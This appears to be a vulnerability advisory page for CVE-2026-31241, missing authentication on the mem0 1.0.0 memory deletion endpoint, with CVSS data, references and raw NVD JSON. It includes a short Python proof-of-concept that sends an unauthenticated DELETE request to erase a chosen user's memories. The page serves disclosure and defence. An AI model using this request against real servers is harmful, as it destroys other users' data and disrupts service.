CVE-2026-31241

Description

The mem0 1.0.0 server lacks authentication and authorization controls for its memory deletion API endpoint (DELETE /memories). The endpoint allows unauthenticated users to delete memory records by specifying arbitrary user identifiers (e.g., user_id, run_id, agent_id) in the request query parameters. A remote attacker can exploit this by sending unauthenticated DELETE requests to erase memory data for any user, leading to unauthorized data loss and denial of service.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:mem0:mem0:1.0.0:*:*:*:*:*:*:* - VULNERABLE

mem0 1.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable mem0 server
target_url = "http://127.0.0.1:8000/memories"

# Arbitrary user identifier (user_id, run_id, or agent_id)
# The attacker does not need to be authenticated as this user
params = {
    "user_id": "victim_user_123"
}

try:
    # Send unauthenticated DELETE request
    response = requests.delete(target_url, params=params)

    if response.status_code == 200:
        print("[+] Exploit successful! Memory data deleted.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31241
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31241
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31241/
[4] VulDB https://vuldb.com/cve/CVE-2026-31241
[5] https://github.com/mem0ai/mem0
[6] https://www.notion.so/CVE-2026-31241-35d1e139318881459ae5e6f0d7dc6f0f

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31241", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:52.557", "lastModified": "2026-05-14T18:34:56.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mem0 1.0.0 server lacks authentication and authorization controls for its memory deletion API endpoint (DELETE /memories). The endpoint allows unauthenticated users to delete memory records by specifying arbitrary user identifiers (e.g., user_id, run_id, agent_id) in the request query parameters. A remote attacker can exploit this by sending unauthenticated DELETE requests to erase memory data for any user, leading to unauthorized data loss and denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mem0:mem0:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "CBD5639B-9888-4EF9-8E41-CC05DBA4720E"}]}]}], "references": [{"url": "https://github.com/mem0ai/mem0", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.notion.so/CVE-2026-31241-35d1e139318881459ae5e6f0d7dc6f0f", "source": "[email protected]", "tags": ["Mitigation", "Third Party Advisory"]}]}}